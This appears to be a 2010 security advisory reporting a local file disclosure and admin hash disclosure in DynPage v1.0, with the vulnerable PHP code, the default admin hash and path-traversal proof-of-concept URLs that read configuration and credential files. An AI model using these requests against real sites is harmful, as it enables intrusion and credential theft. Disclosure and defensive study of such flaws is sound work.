DynPage <= v1.0 Multiple Remote Vulnerabilities
Posted on 07 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>DynPage <= v1.0 Multiple Remote Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== DynPage <= v1.0 Multiple Remote Vulnerabilities =============================================== - Title : DynPage Multiple Remote Vulnerabilities. - Affected Version : <= v1.0 - Vendor Site : http://www.dynpage.net - Discovery : Abysssec.com - Description : =============== DynPage allows you to edit Websites online and make pieces of contents editable with a comfortable editor. DynPage implements the CKeditor - one of the best Internet editors. The integration of content into the HTML pages can be done with Ajax/Javascript or PHP - so you can also handle cross domain sites. DynPage is written in PHP and does not require MySQL database. It's easy to install and to configurate. - Vulnerabilities: ================== 1)Local File Disclosure: --------------------- +Code: /content/dynpage_load.php #[line(20-28)]: $filename = $_GET["file"]; if (!is_dir ($filename) && file_exists ($filename)) { $bytes = filesize ($filename); $fh = fopen($filename, 'r'); print (fread ($fh, $bytes)); fclose ($fh); } +POC: http://www.Site.com/dynpage/content/dynpage_load.php?file=../.htaccess%00 2)Admin hash Disclosure: --------------------------------- The Admin password hash format: MD5('admin:'+$password) then password's salt is "admin:". 2-a)Default password is admin,that stored in config_global.inc.php(line 41-42 ) // Default login admin "default_login_hash" => "d2abaa37a7c3db1137d385e1d8c15fd2", +POC:for see this hash: http://www.Site.com/dynpage/content/dynpage_load.php?file=../config_global.inc.php%00 2-b)the hash password stored as SESSION in /conf/init.inc.php. <?php // This file is generated automatically! // No not modify manually! $_SESSION['DYNPAGE_CONF_VAR_ALL']['login_hash']="2d08086927f4d87a31154aaf0ba2e067"; $_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="a@a.com"; ?> +POC:for see this hash: http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
